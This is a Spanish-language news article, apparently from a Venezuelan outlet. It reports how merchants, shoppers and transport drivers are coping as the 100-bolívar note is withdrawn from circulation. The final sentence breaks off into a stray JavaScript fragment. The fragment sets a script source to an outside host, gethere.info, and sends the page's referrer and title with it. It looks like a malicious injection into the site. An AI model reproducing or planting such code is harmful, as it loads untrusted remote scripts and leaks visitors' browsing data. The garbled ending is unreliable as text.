Economía

Comercios recibirán hasta mañana los billetes de Bs. 100

Los pequeños comerciantes se alistan a recibir hasta el 30 de diciembre. No quieren tener “problemas” a la hora de canje y cola en el banco.

Cuenta regresiva para la vigencia del billete de 100 bolívares. Cuatro días quedan para la circulación del papel moneda de mayor denominación y ya volvió la inquietud en los comerciantes que están cautelosos. El alivio de la prórroga dada por el Gobierno se esfuma entre la expectativa de qué pasará con el sistema bancario y la capacidad de respuesta a los usuarios que demandan operaciones de compra y venta de bienes y servicios con efectivo.

Los pequeños comerciantes se alistan a recibir hasta el 30 de diciembre. Atilio González, comerciante de 57 años de edad, asegura que hasta el viernes aceptará el pago por ventas de productos. No quieren tener “problemas” a la hora de canje y cola en el banco, contratiempo que asoma “será el lunes”. Estima que seguirá “perdiendo ventas porque la gente llega es con esos billetes a pagar y no se puede aceptar”. Confía en una segunda prórroga y “que salgan los nuevos (billetes)”.

Carolina Ramírez, compradora de 36 años de edad, sufrió la limitación. “El carrito de Haticos no quiso aceptarlo, pero cómo se hace si hasta los cajeros te dan son de 100 bolívares”, reprocha en la cola de un banco del sector público. Se inquieta al no saber qué hará si está restringida a comprar comida con dinero en efectivo “que nadie recibe”. Ya el transporte público fijó fecha: ayer, 28 de diciembre, decisión aprobada por las centrales de choferes.

Elio Rivas, primer vicepresidente de la Ucez, lamenta las complicaciones que tienen los comerciantes y los clientes. Señala que “dependerá” de cada comerciante, su capacidad y posibilidad, de aceptar los billetes que salen de circulación el 2 de enero. Conoció que los pequeños negocios recibirán hasta el jueves el papel, teniendo que hacer los depósitos a los bancos el viernes. Algunos cerrarán por las fiestas y evitar dificultades.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;